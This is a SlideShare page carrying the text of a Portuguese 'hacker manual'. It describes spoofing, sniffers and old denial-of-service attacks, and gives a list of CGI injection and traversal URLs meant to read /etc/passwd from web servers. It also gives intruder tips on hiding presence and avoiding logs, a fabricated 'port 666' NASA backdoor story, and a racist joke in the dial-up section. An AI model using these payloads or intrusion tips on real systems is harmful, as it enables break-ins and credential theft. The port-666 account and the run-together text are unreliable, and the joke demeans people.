Manual hacker

2,915 views

Published on

manual do hacker

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,915
On SlideShare
0
From Embeds
0
Number of Embeds
420
Actions
Shares
0
Downloads
47
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Manual hacker

  1. 1. manual do hacker :)=====INVASÃO PELA PORTA 666=====MAS O QUE É ISSO?É UMA PORTA QUE SÓ PODERIA SER USADA PELO GOVERNO AMERICANO E NASA, TANTOQUE ELES COMUNICAM-SE POR ESTA PORTA. BOM, PARA SE CONECTAR POR ELA NÃO ÉNADA FÁCIL, MAS PRECISA DE ALGUNS AJUSTES, É MAIS UMA COISA PARA PEGAR COISASNA CASA DE UM AMIGO SEM ELE FICAR SABENDO.O QUE VOCÊ PRECISA:VOCÊ PRECISA DE UM PROGRAMA CHAMADO AABOUT(www.sites.uol.com.br/HACKERSBRASIL), E PEGUE ESTE PROGRAMA. VOCÊ PRECISA DE UMPROGRAMA PARA ACESSAR TELNET. PARA QUEM NÃO SABE ESTE PROGRAMA FICA NODIRETÓRIO WINDOWS. PRONTO? JÁ TENHO TUDO AGORA? AGORA É SÓ CHAMAR UMAMIGO PARA UMA CONVERSA PELO ICQ, OU PELO CHAT, ELE TAMBÉM DEVE TER AS DUASFERRAMENTAS. DEPOIS DE CHAMÁ-LO, OS DOIS DEVEM EXECUTAR O AABOUT. DEPOIS, ÉSÓ ABRIR O TELNET E NO HOST COLOCAR O IP DINÂMICO DA VÍTIMA E SE CONECTAR APORTA 666 E NO LOGIN A PALAVRA GR!. O PONTO DE EXCLAMAÇÃO DEVE PERMANECER.PRONTO! AGORA VOCÊ ESTARÁ EM UM PROMPT! É SÓ DAR UM DIR, E VOCÊ TEM TOTALCONTROLE SOBRE O PC DO CARA! TANTO CONTROLE QUE PODE CHEGAR A DAR UMFORMAT C: , POR ISSO, SÓ FAÇA ISSO COM SEUS AMIGOS.=====SPOOFING=====PARA QUE VOCÊ COMPREENDA ESTE TEXTO É NECESSÁRIO QUE VOCÊ TENHA ALGUNSCONHECIMENTOS SOBRE UNIX E PROTOCOLOS TCP/IP.ANTES DE MAIS NADA, O SPOOFING NÃO É UM ATAQUE, E SIM PARTE DE UM. LOGO, O 1
  2. 2. SPOOFING É UMA ESPÉCIE DE TÉCNICA DE ATAQUE, DO QUAL O HACKER PODE MASCARARSEU ENDEREÇO IP OU DNS, POR EXEMPLO, DIZENDO AO SISTEMA QUE ELE VAI ATACAR,QUE ELE É CONFIÁVEL. ISSO OCORRE POR QUE AS COMUNICAÇÕES ENTRE COMPUTADORESNA INTERNET SE BASEIA NESTES ENDEREÇOS "CONFIÁVEIS" PARA TROCAREMINFORMAÇÕES. UMA MÁQUINA A PODE MANTER UMA COMUNICAÇÃO COM UMAMÁQUINA B SEM QUE SEJA NECESSÁRIO VERIFICAR TODA HORA SE A INFORMAÇÃO ÉAUTÊNTICA ENTRE ELAS. O HACKER, ENTÃO, PÕE UMA ESPÉCIE DE DISFARCE EM SEU PC,DIZENDO PARA A MÁQUINA A QUE ELE É A MÁQUINA B. ASSIM, A MÁQUINA A VAI ACEITARTODOS OS SEUS COMANDOS E, ENTÃO, O CARA PODE FAZER TUDO O QUE QUISER NELA. OSTIPOS MAIS COMUNS DE SPOOFING SÃO: IP-SPOOFING, DNS-SPOOFING, WEB-SPOOFING, E-MAIL-SPOOFING ENTRE OUTROS.COMO FOI MENCIONADO ANTERIORMENTE, NO SPOOFING O INVASOR TOMA AIDENTIDADE DE HOST CONFIÁVEL. EM UMA REDE UNIX PODEMOS CONFIGURAR HOSTSCONFIÁVEIS. SE UMA MÁQUINA UNIX CRIA EM SEU DIRETORIO/HOME UM ARQUIVOCHAMADO RHOSTS COM OS NOMES DE HOSTS, LOGO QUALQUER USUÁRIO QUE TENHA OUSER ID QUE VOCÊ COLOCOU NESTE ARQUIVO PODE LOGAR-SE NA SUA CONTA USANDO ORLOGIN.O RLOGIN É UM PROTOCOLO BASEADO EM CLIENTE /SERVIDOR SIMPLES, QUE USA O TCPCOMO PROTOCOLO DE COMUNICAÇÃO. O RLOGIN PERMITE AO USUÁRIO LOGAR-SEREMOTAMENTE DE UM HOST AO OUTRO. SE A MÁQUINA ALVO CONFIAR NA MÁQUINADESTE USUÁRIO, O RLOGIN PERMITIRÁ A CONVENIÊNCIA DE NÃO PEDIR PASSWORD. ELASOMENTE IRÁ AUTETICAR O CLIENTE VIA ENDEREÇO IP. ENTÃO PODEMOS EXECUTARCOMANDOS REMOTOS COMO RSH, DESDE QUE DEDE QUE AQUELES HOSTS "CONFIÁVEIS"ESTEJAM LISTADOS NO RHOSTS, SEM PEDIR PASSWORD. OUTRA POSSIBILIDADE É LISTARNOMES DE HOSTS NO ARQUIVO /ETC/HOSTS.EQUIV. NESTE CASO, QUALQUER USUÁRIODAS MÁQUINAS LISTADAS PODE TAMBÉM LOGAR-SE NO HOST LOCAL SEM UMAPASSWORD.THREE-WAY HADSHAKE: QUANDO UM HOST ENVIA UMA MENSAGEM A UM OUTRO HOSTESTE PODE SER DIVIDIDO EM UM NÚMERO DE SEGMENTOS E REDICIONADO AO HOSTDESTINO POR TCP. O IP SOMENTE SE ENCARREGADE ROTEÁ-LO. QUANDO UMA APLICAÇÃOEM UM CLIENTE QUER ALCANÇAR A OUTRA EM UM SERVIDOR, DEVE CONHECER A O IP DAMÁQUINA-DESTINO E Ó NÚMERO DA PORTA TCP DESIGNADO À APLICAÇÃO, E DECIDIRENTÃO A CONEXÃO DESTINO. (CONEXÃO-DESTINO=DIREÇÃO IP+PORTA TCP).PARA ESTABELECER UMA CONEXÃO, O TCP UTILIZA UM PROCEDIMENTO DENOMINADO "3- 2
  3. 3. WAY HANDSHAKE". NESTE PROCESSO, 3 MENSAGENS (SYN, SYN/ACK y ACK) SÃOREQUERIDAS PARA ESTABELECER A CONEXÃO. ENTRE A INFORMAÇÃO INTERCAMBIADAESTÁ A DIREÇÃO DE CADA MÁQUINA E O NÚMERO DE SEQUENCIA INICIAL (#SI) QUE AMBASUTILIZARÃO PARA ESTABELECER A COMINICAÇÃO. ESTES NÚMEROS SÃO EXCLUSIVOS PARAA COMUNICAÇÃO ENTRE ESSAS DUAS MÁQUINAS, E SE BASEIAM NA HORA DO RELÓGIOINTERNO DO SISTEMA. UMA VEZ ABERTA A CONEXÃO. AS DUAS MÁQUINAS JÁ"AUTENTICADAS", ESTÃO PRONTAS PARA TROCAR DADOS.=====ATAQUE POR MONITORAÇÃO=====ATAQUES POR MONITORAÇÃO SÃO BASEADOS EM SOFTWARE DE MONITORAÇÃO DE REDECONHECIDO COMO SNIFFER, INSTALADO PELOS INVASORES. O SNIFFER GRAVA OSPRIMEIROS 128 BYTES DE CADA SESSÃO LOGIN, TELNET E FTP SESSION VISTA NAQUELESEGMENTO DE REDE LOCAL COMPROMETENDO TODO O TRÁFEGO DE/PARA QUALQUERMÁQUINA NAQUELE SEGMENTO, BEM COMO O TRÁFEGO QUE PASSAR POR AQUELESEGMENTO. OS NOMES CAPTURADOS INCLUEM O HOST DESTINO, O USERNAME E APASSWORD. A INFORMAÇÃO É GRAVADA NUM ARQUIVO POSTERIORMENTE RECUPERADOPELO INVASOR PARA TER ACESSO A OUTRAS MÁQUINAS. EM MUITOS CASOS OS INVASORESOBTEM ACESSO INICIAL AOS SISTEMAS USANDO UMA DAS SEGUINTES TÉCNICAS: OBTEM OARQUIVO DE PASSWORDS VIA FTP EM SISTEMAS IMPROPRIAMENTE CONFIGURADOS;OBTEM O ARQUIVO DE PASSWORDS DE SISTEMAS RODANDO VERSÕES INSEGURAS DO NIS;OBTEM ACESSO AO SISTEMA DE ARQUIVOS LOCAIS VIA PONTOS EXPORTADOS PARAMONTAGEM COM NFS, SEM RESTRIÇÕES; USAM UM NOME DE LOGIN E PASSWORDCAPTURADA POR UM SNIFFER RODANDO EM OUTRO SISTEMA. UMA VEZ NO SISTEMA, OSINVASORES OBTEM PRIVILÉGIOS DE ROOT EXPLORANDO VULNERABILIDADES CONHECIDAS,TAÇ COMO RDISTSUN SPARC INTEGER DIVISION E ARQUIVOS UTMP POSSÍVEIS DE ESCRITAPOR TODO MUNDO OU USANDO UMA PASSWORD DE ROOT CAPTURADA. ELES ENTÃOINSTALAM O SOFTWARE SNIFFER, REGISTRANDO A INFORMAÇÃO CAPTURADA NUMARQUIVO INVISÍVEL.ADICIONALMENTE, ELES INSTALAM CAVALOS DE TRÓIA EM SUBSTITUIÇÃO E UMA OU MAISDENTRE OS SEGUINTES ARQUIVOS DE SISTEMA, PARA OCULTAR SUA PRESENÇA:/BIN/LOGIN/USR/ETC/IN.TELNETD 3
  4. 4. /USR/KVM/PS/USR/UCB/NETSTATENTENDA O BARRAMENTO DO MICROISA- O BARRAMENTO SURGIU COM OS XT´S, O ISA ORIGINAIS ERAM DE 8 BITS E RODAVAMA 4,77 MHZ. COM O ADVENTO DOS AT, VAIO O ISA DE 16 BITS QUE OPERAVAM A 8 MHZ.,UTILIZADOS ATÉ HOJE.POR EXEMPLO, AS FAX-MODEM POSSUEM BARRAMENTO ISA DE 8 BITS.OS BARRAMENTOS UTILIZADOS ATUALMENTE SÃO O ISA, VESA E PCI, ESSES DOIS ÚLTIMOSSÃO O QUE SE CHAMA DE LOCAL BUS.SÃO CAHMADOS DE LOCAL BUS POR FUNCIONAREM EM CONEXÃO DIRETA COM A CPU.VESA- HOJE MUITO POPULAR, NÃO CHEGA A CONSTITUIR UM BARRAMENTO NOVO, ELE ÉBASICAMENTE UM ISA ALTERADO, E É UM BARRAMENTO RÁPIDO, DE 32 BITS EFREQÜÊNCIA DE FUNCIONAMENTO DE 33 MHZ. A VELOCIDADE DE TRANSMISSÃO É DE130MBITS/S.=====ROUBANDO SENHAS DE SITES=====ESTAS SENHAS PERMITEM QUE VOCÊ ENTRE EM SITES RESTRITOS QUE NECESSITAM DESENHA PARA ENTRAR. (NÃO FUNCIONA EM TODOS)phf http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0acat%20/etc/passwd php.cgihttp://xxx.xxx.xxx/cgi-bin/php.cgi?/etc/passwd test-cgi http://xxx.xxx.xxx/cgi-bin/test- 4
  5. 5. cgi?/etc/* query http://xxx.xxx.xxx/cgi-bin/query?%0a/bin/cat%20/etc/passwd faxsurveyhttp://xxx.xxx.xxx/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd htmlscripthttp://xxx.xxx.xxx/cgi-bin/htmlscript?../../../../etc/passwd webdist.cgi http://xxx.xxx.xxx/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd nph-test-cgi http://xxx.xxx.xxx/cgi-bin/nph-test-cgi?/etc/* echo http://xxx.xxx.xxx/cgi-bin/echo?%0Acat%20/etc/passwd view-sourcehttp://xxx.xxx.xxx/cgi-bin/view-source?../../../../../etc/passwd pfdisplayhttp://xxx.xxx.xxx/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd campas http://xxx.xxx.xxx/cgi-bin/campas?%0acat%0a/etc/passwd%0a wrap http://xxx.xxx.xxx/cgi-bin/wrap?/../../../../../etc whatever http://xxx.xxx.xxx/cgi-bin/handler/whatever;cat/etc/passwd|? data=Download xenolith http://xxx.xxx.xxx/cgi-bin/handler/xenolith;cat/etc/passwd/| ?data=DownloadSubstitua o xxx.xxx.xxx pelo endereço do siteDoSPARA COMEÇAR A ESCREVER SOBRE DoS, NADA MELHOR DO QUE EXPLICAR O QUE É ISSO.O LAMMER VEM E DIZ: " EU SEI! É UM SISTEMA OPERACIONAU SUPER LEGAL CRIADU PELUBIU GAYTIS, PAI DU MERCADU DI SOFITIWARE! I EU SEI TUDU DELI!" NÃO!!!!! O HACKINGNÃO SE LIMITA A MERDAS COMO DOS LAMMAH! NA VERDADE NEM SEI SE CHEGA AINCLUIR TAMANHA BOSTA. ASSIM, DOS E DoS SÃO COISAS DIFERENTES. ENQUANTO DOSQUER DIZER "DISK OPERATING SYSTEM", DoS QUER DIZER "DENIAL OF SERVICE". DoS É UMATAQUE MUITO ÚTIL, E COMO O PRÓPRIO NOME DIZ, NEGA UM DETERMINADO TIPO DESERVIÇO AOS USUÁRIOS, ISTO É, IMPEDE QUE ACESSEM UM DETEMINADO SERVOÇO DOHOST.PODE-SE TER COMO ALVO DE UM DoS DESDE O MAIS BAIXO LAYERDO TCP/IP ATÉ STACKATÉ O LAYER DE APLICAÇÃO, TRAVANDO O IRC DO CARA, POR EXEMPLO. COMO VEREMOSAQUI, NÃO EXISTE UM ATAQUE DE DoS, E SIM VÁRIOS TIPOS DE ATAQUES QUE PODEM SERCONSIDERADOS COMO DoS, CADA UM DELES ATACANDO UMA PARTE DO TCP/IP E DOSSEUS SUBPROTOCOLOS.A UTILIDADE? VÁRIAS! O PRÓPRIO MAIL BOMB PODE SER CLASSIFICADO COMO UMATAQUE DE DoS, POIS ELE ENCHE A CAIXA DO MANÉ DE MENSAGENS IMPDINDO QUE ELECHEQUE OU TALVEZ ATÉ TRAVANDO O POP3. OUTRO EXEMPLO É O WINNUKE, QUE ATACAUM DRIVER DO TCP/IP E FAZ COISAS QUE VARIAM DE CAIR A CONEXÃO DO CARA ATÉRESETAR O MICRO DO SUJEITO. ASSIM, O DoS SURGE COMO UM NOVO CAMPO A SEREXPLORADO, INVESTIGANDO NÃO SOMENTE FUROS DE SEGURANÇA MAS SIM FRAQUEZASNA MANEIRA COM QUE OS PROTOCOLOS E OS SISTEMAS OPERACIONAIS LIDAM COM 5
  6. 6. DETERMINADOS TIPOS E QUANTIDADES DE DADOS. SE VOCÊ AINDA NÃO TOMOU UMANOÇÃO CLARA DO QUE SERIA DoS, OS ATAQUES ABAIXO IRÃO AJUDÁ-LO A ENTENDER.WINNUKEOS AFETADOS: WIN 95 (INCLUINDO OSR2), E WINDOWS NT 4.0.QUANDO O TITIO BILL GATE$ CRIOU WINDOWS 95 E CIA, PENSOU EM COMO SERIA AIMPLANTAÇÃO DO COMPARTILHAMENTO DE ARQUIVOS, DADA ATRAVÉS DE UMPROTOCOLO CHAMADO NETBIOS. QUERIA QUE FOSSE ALGO PRÁTICO, CONSTANTE E SEMDIFICULDADES PARA O USUÁRIO FINAL. POR ISSO, RESERVOU AO NETBIOS A PORTA TCP/IP139 E DEIXOU ELE ABERTA EM TODOS OS SISTEMAS, COMO UM DEFALT. ACONTECE QUEACABARAM DESCOBRINDO QUE ERA POSSÍVEL FAZER UM ATAQUE DE DoS BEMINTERESSANTE COM ESSA PORTA 139. ESTE ATAQUE CONSISTE EM MANDAR UMAMENSAGEM OOB (OUT OF BAND) PARA ESSA PORTA E COMO O RWINDOWS NÃO SABELIDAR COM ESSE TIPO DE MENSAGEM, OCORRE UM ERRO NO TCP/IP DO SEU RWINDOWS,FAZENDO APARECER PORTANTO, A FAMOSA TELA AZUL COM AS MENSAGENS DE ERRO DEDRIVER. EMBORA SEJA MAIS COMUM WINNUKAR UMA PESSOA PELA PORTA 139, ISSOPODE SER FEITO POR OUTRAS PORTAS RELACIONADAS AO NETBIOS (COMO 135 E 137),DESDE QUE ESTEJAM "ESCUTANDO".LANDOS AFETADOS- WIN95 (INCLUINDO OSR2), WIN NT 4.0 E BSDI 2.1 E OUTROSENTRE OUTROS, O LINUX NÃO É AFETADO A PARTIR DO KERNEL 2.0.30ESSE ATAQUE USA UM MECANISMO INTERESSANTE, PORÉM NÃO CAUSA DANOSCONSIDERÁVEIS, SÓ CAUSANDO UMA CERTA LENTIDÃO POR ALGUNS INSTANTES. É OSEGUINTE: VOCÊ MANDA VÁRIOS PACOTES DE TCP/IP COM A FLAG SYN, SPOOFADOS COMO IP DO PRÓPRIO ALVO. A FLAG SYN É A FLAG DO TCP/IP RESPNSÁVEL POR INICIAR UMACONEXÃO TCP/IP, CONHECIDA COMO TRHEE WAY HANDSHAKING. ASSIM, AO RECEBER 6
  7. 7. UMA FLAG SYN, O TCP/IP RESPONDE O CLIENTE IMEDIATAMENTE COM UM PACOTE COMAS FLAGS SYN E ACK. O QUE O LAND FAZ É O SEGUINTE: COMO AS SYN REQUESTS ESTÃOSPOOFADAS COM O IP DO PRÓPRIO ALVO, ESSE ALVO ACABA MANDANDO AS SYN ACK´SPARA ELE MESMO, CAUSANDO UMA LENTIDÃO ENORME NO SISTEMA E CHEGANDO ATÉ ATRAVÁ-LO EM ALGUMAS VARIAÇÕES. SIMPLES E EFICIENTE.TEARDROPAS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT E LINUXESSE ATAQUE TAMBÉM É MUITO FAMOSO. ELE EXPLORA UM BUG PRESENTE NO LAYER IP(RELACIONADO À FRAGMENTAÇÃO DE DATAGRAMAS IP) DO TCP/IP STACK DOS DIFERENTESOS´S CITADOS ACIMA. QUANDO A VÍTIMA RECEBE DETERMINADOS DADOS, SEU SISTEMAPODE CONGELAR REPENTINAMENTE SUA CONEXÃO CAI E NO CASO DE SISTEMASWINDOWS PODE ATÉ SER QUE APAREÇA A FAMOSA E TEMIDA TELA AZUL, ACUSNDO UMERRO. ENTRETANTO, ESSE BUG NÃO CAUSA GRAVES DANOS E UM SIMPLES REBOOT IRÁNORMALIZAR TUDO.VOCÊ ENCONTRARÁ MAIORES DETALHES NA BOA E VELHA ROOTSHELL(HTTP://WWW.ROOTSHELL.COM). É SÓ DAR UM SEARCH.SSPING/JOLTOS AFETADOS- WIN 95 (INCLUINDO OSR2), WIN NT 4.0 E ANTIGAS VERSÕES DE MAC’OS.ESSE EXPLOITS DESENTERRA O VELHO PROBLEMA DOS SISTEMAS WINDOWS COM OPROTOCOLO ICMP, E MAIS ESPECIFICAMENTE COM A FUNÇÃO PING. O QUE O SSPING FAZ ÉQUE ELE CRIA PACOTES DE DADOS ICMP MUITO GRANDES (MAIS QUE O PERMITIDO), OSFRAGMENTA EM VÁRIAS PARTES (PARA PODER ENVIAR) E OS ENVIA DE UMA VEZ SÓ PARAO ALVO. QUANDO O ALVO PEGA ESSES FRAGMENTOS E TENTA REMONTAR OS PACOTESORIGINAIS ELE TRAVA E É PRECISO REINICIÁ-LO. 7
  8. 8. BONK/BOINKOS AFETADOS- WIN 95 (INCLUINDO OSR2) E WIN NT 4.0.ESSES DOIS SÃO NA VERDADE VARIAÇÕES DO CONHECIDO TEARDROP. O BONK SERIA UMTEARDROP QUE TRAVA MESMO MÁQUINAS PATCHEADAS. JÁ O BOINK É UMA VERSÃOMAIS AVANÇADA DO BONK E PERMITE QUE PORTAS UDP SEJAM USADAS COMO ALVO.ESSES FATOS SE BASEIAM NO FATO DE QUE O WINDOWS PODE TRAVAR SE RECEBERMUITOS PACOTES UDP CORROMPIDOS. ASSIM O PROGRAMA MANDA VÁRIOSDATAGRAMAS IP FRAGMENTADOS E NO COMPUTADOR ALVO SÃO REMONTADOS EMPACOTES UDP INVÁLIDOS ATRAVÉS DO "OVERLAPPING BUG", TAMBÉM MUITO EXPLORADONO TEARDROP.SMURFOS AFETADOS- TODOS. ISSO MESMO! VOCÊ OUVIU BEM! T-O-D-O-S!AGORA CHEGOU A HORA DE FALAR SOBRE UM DOS ATAQUES MAIS EFICIENTES E LOUCOS.O SMURF! A SIMPLICIDADE DESSE ATAQUE CHEGA A IMPRESSIONAR QUANDO SE OBSERVAOS DANOS QUE PODEM SER CAUSADOS. ENTRE TODOS OS DoS DESCRITOS ATÉ AQUI, ESSE ÉO PRIMEIRO QUE NÃO ENVOLVE APENAS DOIS COMPUTADORES: O INVASOR E A VÍTIMA,MAIS SIM CENTENAS, ATÉ MILHARES DE HOSTS, CONTRA APENAS UM SÓ!! DEVASTADOR!!O QUE O SMURF FAZ É QUE ELE MANDA UM BROADCAST DE PACOTES ICMP (MANDA PARAVÁRIOS ENDEREÇOS, CONTIDOS EM UMA LISTA A SER CRIADA POR VOCÊ) SÓ QUE COM OENDEREÇO DE ORIGEM SPOOFADO COM O IP DA VÍTIMA. ASSIM, TODOS OSCOMPUTADORES QUE FORAM PINGADOS IRÃO RESPONDER UNICAMENTE PARA ESSECOMPUTADOR VÍTIMA.POR EXEMPLO: SE VOCÊ MANDA UM PING PRA 1000 COMPUTADORES E ESSE PING TEMCOMO IP DE ORIGEM O IP DA VÍTIMA, ESSE COITADO IRÁ RECEBER NADA MAIS NADAMENOS DO QUE 1000 PACOTES ICMP DE RESPOSTA!!!!! QUASE AO MESMO TEMPO!!! ISSOSIMPLESMENTE DETONA COM O MICRO DO CARA E TRAVA ELE TOTALMENTE, TENDO QUESER REINICIADO. 8
  9. 9. FINGER DoSOS QUE ESTÃO RODANDO FINGER UNPATCHEADOPARA QUEM NÃO SABE, FINGER É UM SERVIÇO MUITO PRESENTE EM SISTEMAMULTIUSUÁRIO (ESPECIALMENTE SISTEMAS UNIX) QUE MOSTRA QUEM ESTÁ LOGADO NOSISTEMA, SEUS LOGINS, TERMINAIS QUE ESTÃO UTILIZANDO, TEMPO QUE ESTÃO LOGADOS,ETC. É BEM ÚTIL NA OBTENÇÃO DE INFORMAÇÃO PARA UMA HACKEADA, MAS NÃO É DISSOQUE ESTAMOS FALANDO AGORA.O FINGER OPERA NA PORTA 79 E FUNCIONA NO ESQUEMA REQUEST-ANSWER. ASSIM,VOCÊ FAZ UM FINGER REQUEST PARA O FINGERD DE UM HOST E ESTE HOST TE RESPONDE,DE ACORDO COM A REQUEST QUE FOI FEITA.SE VOCÊ QUISER SABER QUEM ESTÁ LOGADO NO SISTEMA VOCÊ DÁ O COMANDOFINGER@SISTEMA .COM.BR E LOGO VERÁ UMA LISTA DE USUÁRIOS LOGADOS.SE QUISER SABER INFORMAÇÕES SOBRE UM DETERMINADO USUÁRIO VOCÊ DÁ OCOMANDO FINGER USUÁRIO@SISTEMA.COM.BR.O ATAQUE CONSITE EM VÁRIOS REQUESTS ENVIADOS RAPIDAMENTE PARA O ALVO.USUÁRIO@@@@@@@@@@SISTEMA.COM.BR.CADA @ QUE VOCÊ COLOCOU REPRESENTA UM REQUEST E LOGO ASSIM, O COMPUTADORDA VÍTIMA SOFRERÁ UM FLOOD DE REQUESTS, O QUE DIMINUIRÁ O DESEMPENHO.(NUNCA SOUBE DE NENHUM TRAVAMENTO OCASIONADO POR ESTE ATAQUE).ENTÃO É SEGUINTE MANO! SE VOCÊ TEM NEURÔNIOS O SUFICIENTE EM SEU CÉREBROPERCEBEU QUE O WIN 95 E NT SÃO AS VÍTIMAS DE QUASE TODOS OS ATAQUES LISTADOSAQUI. E NÃO PENSE QUE ESSES SÃO TODOS, POIS EXISTEM MUITOS OUTROS QUE ESTÃOSENDO CRIADOS NO MOMENTO. DoS É AGORA, COMO JÁ MENCIONEI ANTES, UM CAMPO A 9
  10. 10. SER EXPLORADO PELOS HACKERS.SNIFFERO SEGUINTE DOCUMENTO VISA AUXILIAR ADMINISTRADORES A COMPREENDERPROBLEMAS RELACIONADOS COM SNIFFING E AS POSSÍVEIS SOLUÇÕES. A AÇÃO DOSSNIFFERS É ATUALMENTE UM DOS PRINCIPAIS PROBLEMAS DE SEGURANÇA.O QUE É O SNIFFER E COMO ELE FUNCIONA?COMPUTADORES EM REDE COMPARTILHAM CANAIS DE COMUNICAÇÃO. ISSO ÉOBVIAMENTE MUITO MAIS BARATO DO QUE PASSAR UM CABO EM CADA PAR DECOMPUTADORES PARA FAZER AS CONEXÕES. NESTES CANAIS COMPARTILHADOS,COMPUTADORES PODEM RECEBER INFORMAÇÕES ENVIADAS A OUTROS COMPUTADORES.A AÇÃO DE CAPTURAR INFORMAÇÕES DESTINADAS A OUTROS COMPUTADORES ÉCHAMADA SNIFFING.O PADRÃO ETHERNET ENVIA UM PACOTE PARA TODAS AS MÁQUINAS EM UM MESMOSEGMENTO. O CABEÇALHO DO PACOTE CONTÉM O ENDEREÇO DA MÁQUINA DESTINO.SUPÕEM-SE QUE SOMENTE A MÁQUINA QUE TENHA O ENDEREÇO CONTIDO NO PACOTERECEBA-O. DIZ-SE QUE UM COMPUTADOR ESTÁ EM MODO PROMÍSTUO QUANDO OMESMO CAPTURA TODOS OS PACOTES, INDEPENDENTEMENTE DE SEREM OU NÃODESTINADOS A ELE.EM UM AMBIENTE DE REDE NORMAL, OS NOMES E AS SENHAS DOS USUÁRIOS SÃOPASSADAS ATRAVÉS DA REDE EM CLARO, OU SEJA, TEXTO NÃO CRIPTOGRAFADO. NÃO ÉDIFÍCIL, PORTANTO, UM INTRUSO UTILIZANDO UMA MÁQUINA COM INTERFACE DE REDEEM MODO PROMÍSTUO, OBTER QUALQUER SENHA, INCLUSIVE A DO ROOT, UTILIZANDOUM SNIFFER.DICAS DE ÉTICA HACKERDESCOBRIU ALGO NOVO, OLHE.NÃO APAGUE. PENSE NO QUE SERIA MELHOR: TER ACESSO A PROVEDOR OU DETONÁ-LO? 10
  11. 11. NÃO MODIFIQUE NADA, A MENOS QUE QUER QUE SAIBAM QUE ESTEVE LÁ.NUNCA TENTE UM SU ROOT DIRETO. ISSO FICA LOGADO.NÃO FIQUE USANDO TELNET OU PEGANDO E-MAIL USANDO ACESSO DOS OUTROS.NUNCA SUBESTIME UM SYSOP.ESCOLHA HORAS ENTRE 0:30 E 6:00.UMA VEZ LÁ DENTRO TENTE DOMINAR O LUGAR, MAS COM CAUTELA.NÃO COFIE EM NINGUÉM.SE PEGAR A SENHA DO ROOT DE UM PROVEDOR DE ACESSO E NÃO SABE O QUE FAZER,MATE-SE!NÃO TESTE VÍRUS NO PRÓPRIO HD.É BOM PREPARAR MUITO BEM UM A ESTRATÉGIA ANTES DE ATACAR.USE OS COMPUTADORES DE SUA UNIVERSIDADE (É MAIS SEGURO)NÃO FIQUE DISTRIBUINDO INFORMAÇÕES SOBRE O QUE VOCÊ PEGOU.NÃO TENHA PENA DE NINGUÉM.VOCÊ USA MS-DOS, LINUX, WINDOWS OU UNIX? NÃO CONTE A NINGUÉM...NÃO CRIE LAÇOS AFETIVOS COM A VÍTIMA.APRENDA O MÁXIMO QUE PUDER COM QUEM SABE MAIS! NÃO SE META A BESTA DIRETO!MAIS DICASCONHEÇA A FUNDO OS SOSTEMAS OPERACIONAIS COMO O WINDOWS, LINUX E UNIX,WINDOWS NT. COM ELES É QUE VOCÊ IRÁ ENTENDER COMO QUEBRAR A SEGURANÇA OUENTÃO COMO FUNCIONA A SEGURANÇA, É MAIS DIFÍCIL, MAIS NÃO IMPOSSÍVEL.APRENDA UMA LINGUAGEM DE PROGRAMAÇÃO COMO VISUAL BASIC OU C. VOCÊESCREVENDO PEQUENOS PROGRAMINHAS PODE DEIXAR UM PROGRAMA RODANDO EMPARALELO PARA DESCOBRIR SENHAS DE ACESSO.APRENDA A USAR O COMANDO TELNET DO UNIX PARA SE LOGAR EM MÁQUINASREMOTAMENTE E COPIAR AQUELE PROGRAMA OCULTO QUE FALTA PARA VOCÊ ENTRAR 11
  12. 12. NOO SISTEMA OU ENTÃO CADASTRAR UM USUÁRIO FANTASMA PARA ENTRAR NO SITEMA.APRENDA COMO FUNCIONAM AS REDES E QUAIS OS TIPOS DE REDES QUE EXISTEM. HOJEEM DIA, A MAIORIA DOS COMPUTADORES ESTÃO INTERLIGADOS E VOCÊ CONHECENDO AARQUITETURA E PROTOCOLOS USADOS FACILITA BASTANTE O ACESSO.APRENDA O PROTOCOLO TCP/IP, QUE É USADO HOJE EM DIA NA INTERNET. ISSO SE VOCÊQUISER SER UM HACKER DA NET.DIAL UPDEVIDO A UMA ENORME QUANTIDADE DE BUGS E UMA CAPACIDADE DE PROTEÇÃO QUEPERMITE QUE QUALQUER PESSOA INVADA UM MICRO QUE UTILIZE A REDE DIAL UP, COMUMA CONEXÃO PPP, O WINDOWS É UM DOS MAIORES MOTIVOS DE PIADAS ENTRE OSPORTUGUESES, NEGROS E O RUBINHO BARRICHELO. MESMO QUE VOCÊ NÃO ESTEJAUTILIZANDO O COMPARTILHAMENTO DE ARQUIVOS, QUALQUER PESSOA PODE INVADIRSEU COMPUTADOR SE VOCÊ ESTIVER FAZENDO ESTE TIPO DE CONEXÃO.PARA ESTA "RECEITA DE BOLO" FUNCIONAR, VOCÊ TEM QUE ESTAR USANDO A REDE DIALUP E UMA CONEXÃO PPP. ANTES DE TUDO VERIFIQUE SE VOCÊ POSSUI OS DRIVERSCLIENTES DA MICROSOFT. CASO NÃO ESTEJA, INSTALE-OS ATRAVÉS DO PAINEL DECONTROLE NO ÍCONE REDE. VERIFIQUE TAMBÉM, SE O COMPARTILHAMENTO DEARQUIVOS E IMPRESSORAS ESTÁ INSTALADO.CONFIGURAR ESTAS OPÇÕES É SIMPLES. VÁ AO PAINEL DE CONTROLE E ABRA REDE.VERIFIQUE AS PROPRIEDADES DO TCP/IP. ALPI VOCÊ ENCONTRARÁ A OPÇÃO PARA ATIVARA RESOLUÇÃO WINS. NO CASO DE VOCÊ NÃO CONHECER NENHUM SERVIDOR WINS,204.118.34.6 COMO PRIMÁRIO E 204.118.34.11 COMO SECUNDÁRIO. ESSES SERVIDORESSÃO SO USA E GRATUÍTOS. CASO QUEIRA OUTROS ENDEREÇOS, UTILIZE UM DOSMECANISMOS DE BUSCA DA INTERNET. PARA CONFIGURAR O LMHOSTS VOCÊ PRECISACRIAR UM ARQUIVO TEXTO SIMPLES, COM O NOME DE LMHOSTS. NESSE ARQUIVO É ONDEFICARÃO OS ENDEREÇOS DE IP E OS NOMES DOS COMPTADORES ACESSADOS. PARALOCALIZAR DETERMINADO COMPUTADOR VOCÊ DIGITA O SEU NÚMERO DE IP E A SEGUIRSEU NETBIOS, NA MESMA LINHA, ESPARADO POR UM ESPAÇO. SE VOCÊ EXECUTAR OPROGRAMA NBTSTAT –N, TERÁ A LISTA, COM O NOME E O IP DE SEU COMPUTADOR,SEMPRE SENDO O PRIMEIRO DA LISTA, SEGUIDO DAS OUTRAS 